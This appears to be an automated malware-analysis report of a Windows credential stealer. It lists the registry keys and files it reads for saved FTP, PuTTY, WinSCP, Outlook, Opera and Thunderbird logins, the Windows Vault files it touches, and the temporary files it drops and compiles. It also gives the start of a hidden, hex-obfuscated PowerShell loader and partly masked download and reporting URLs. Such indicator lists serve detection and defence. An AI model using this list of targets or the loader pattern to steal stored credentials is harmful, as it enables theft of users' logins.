Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function e6b399 {param($a5ecc5)$yd989='dec7a9';$n5845='';for ($i=0; $i -lt $a5ecc5.length;$i+=2){$lb9f6=[convert]::ToByte($a5ecc5.Substring($i,2),16);$n5845+=[char]($lb9f6...
- g592c3b.exe
- [<HKCU>\Software\LinasFTP\Site Manager]
- [<HKCU>\Software\FlashPeak\BlazeFtp\Settings]
- [<HKCU>\Software\Ghisler\Total Commander]
- [<HKCU>\Software\Far\Plugins\FTP\Hosts]
- [<HKCU>\Software\Far2\Plugins\FTP\Hosts]
- [<HKCU>\Software\VanDyke\SecureFX]
- [<HKLM>\Software\Wow6432Node\NCH Software\Fling\Accounts]
- [<HKCU>\Software\NCH Software\Fling\Accounts]
- [<HKLM>\Software\Wow6432Node\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\NCH Software\ClassicFTP\FTPAccounts]
- [<HKCU>\Software\SimonTatham\PuTTY\Sessions]
- [<HKLM>\Software\Wow6432Node\SimonTatham\PuTTY\Sessions]
- [<HKCU>\Software\Martin Prikryl]
- [<HKLM>\Software\Wow6432Node\Martin Prikryl]
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
- %APPDATA%\opera software\opera stable\login data
- %APPDATA%\thunderbird\profiles.ini
- %TEMP%\oq01e2sq.0.cs
- %TEMP%\ykxpd1mz.out
- %TEMP%\res7b5d.tmp
- %TEMP%\lrzmz_c7.dll
- %TEMP%\oq01e2sq.dll
- %TEMP%\ju1mnbvk.out
- %TEMP%\csc832c.tmp
- %TEMP%\res834c.tmp
- %TEMP%\ju1mnbvk.cmdline
- %TEMP%\lzhjx_69.dll
- %TEMP%\csc85fb.tmp
- %TEMP%\ju1mnbvk.dll
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{9729e233-642c-46af-a897-378f493ae5f6}.tmp
- %APPDATA%\g592c3b.exe
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\ykxpd1mz.dll
- %TEMP%\res860b.tmp
- %TEMP%\ju1mnbvk.0.cs
- %TEMP%\csc789d.tmp
- %TEMP%\res788e.tmp
- %TEMP%\oq01e2sq.out
- %TEMP%\lzhjx_69.0.cs
- %TEMP%\lzhjx_69.cmdline
- %TEMP%\lzhjx_69.out
- %TEMP%\lrzmz_c7.0.cs
- %TEMP%\lrzmz_c7.cmdline
- %TEMP%\lrzmz_c7.out
- %TEMP%\rjk4svgs.0.cs
- %TEMP%\oq01e2sq.cmdline
- %TEMP%\rjk4svgs.cmdline
- %TEMP%\ykxpd1mz.0.cs
- %TEMP%\csc7253.tmp
- %TEMP%\csc733e.tmp
- %TEMP%\ykxpd1mz.cmdline
- %TEMP%\res734e.tmp
- %TEMP%\csc786e.tmp
- %TEMP%\res7264.tmp
- %TEMP%\rjk4svgs.dll
- %TEMP%\rjk4svgs.out
- %APPDATA%\e6f983\35a09b.hdb
- %APPDATA%\e6f983\35a09b.lck
- %APPDATA%\e6f983\35a09b.exe
- %TEMP%\res734e.tmp
- %TEMP%\lzhjx_69.dll
- %TEMP%\lzhjx_69.out
- %TEMP%\lzhjx_69.0.cs
- %TEMP%\lzhjx_69.cmdline
- %TEMP%\lzhjx_69.pdb
- %TEMP%\res834c.tmp
- %TEMP%\csc832c.tmp
- %TEMP%\ykxpd1mz.dll
- %TEMP%\ykxpd1mz.cmdline
- %TEMP%\ju1mnbvk.cmdline
- %TEMP%\ykxpd1mz.out
- %TEMP%\ykxpd1mz.pdb
- %TEMP%\res860b.tmp
- %TEMP%\csc85fb.tmp
- %TEMP%\ju1mnbvk.out
- %TEMP%\ju1mnbvk.0.cs
- %TEMP%\ju1mnbvk.pdb
- %TEMP%\ju1mnbvk.dll
- %TEMP%\lrzmz_c7.pdb
- %TEMP%\ykxpd1mz.0.cs
- %TEMP%\lrzmz_c7.0.cs
- %TEMP%\rjk4svgs.cmdline
- %TEMP%\res7264.tmp
- %TEMP%\csc733e.tmp
- %TEMP%\res788e.tmp
- %TEMP%\csc7253.tmp
- %TEMP%\rjk4svgs.out
- %TEMP%\rjk4svgs.0.cs
- %TEMP%\rjk4svgs.dll
- %TEMP%\rjk4svgs.pdb
- %TEMP%\res7b5d.tmp
- %TEMP%\lrzmz_c7.cmdline
- %TEMP%\csc789d.tmp
- %TEMP%\csc786e.tmp
- %TEMP%\oq01e2sq.pdb
- %TEMP%\oq01e2sq.cmdline
- %TEMP%\oq01e2sq.0.cs
- %TEMP%\oq01e2sq.dll
- %TEMP%\oq01e2sq.out
- %TEMP%\lrzmz_c7.dll
- %TEMP%\lrzmz_c7.out
- %APPDATA%\e6f983\35a09b.lck
- from %APPDATA%\g592c3b.exe to %APPDATA%\e6f983\35a09b.exe
- %APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-1960123792-2022915161-3775307078-1001\f58155b4b1d5a524ca0261c3ee99fb50_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
- http://23.###.165.205:4560/vpadmin/pressing.exe via 23.##9.165.205
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- http://19#.#2.125.130/~axsonipc/.faragamo/vf.php
- DNS ASK do#########ocs.googleusercontent.com
- DNS ASK oc##.#tartssl.com
- '%APPDATA%\g592c3b.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function e6b399 {param($a5ecc5)$yd989='dec7a9';$n5845='';for ($i=0; $i -lt $a5ecc5.length;$i+=2){$lb9f6=[convert]::ToByte($a5ecc5.Substring($i,2),16);$n5845+=[char]($lb9f6...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oq01e2sq.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lzhjx_69.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lrzmz_c7.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rjk4svgs.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7264.tmp" "%TEMP%\CSC7253.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES734E.tmp" "%TEMP%\CSC733E.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES788E.tmp" "%TEMP%\CSC786E.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7B5D.tmp" "%TEMP%\CSC789D.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ykxpd1mz.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ju1mnbvk.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES834C.tmp" "%TEMP%\CSC832C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES860B.tmp" "%TEMP%\CSC85FB.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\oq01e2sq.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lzhjx_69.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\lrzmz_c7.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\rjk4svgs.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7264.tmp" "%TEMP%\CSC7253.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES734E.tmp" "%TEMP%\CSC733E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES788E.tmp" "%TEMP%\CSC786E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7B5D.tmp" "%TEMP%\CSC789D.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ykxpd1mz.cmdline"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ju1mnbvk.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES834C.tmp" "%TEMP%\CSC832C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES860B.tmp" "%TEMP%\CSC85FB.tmp"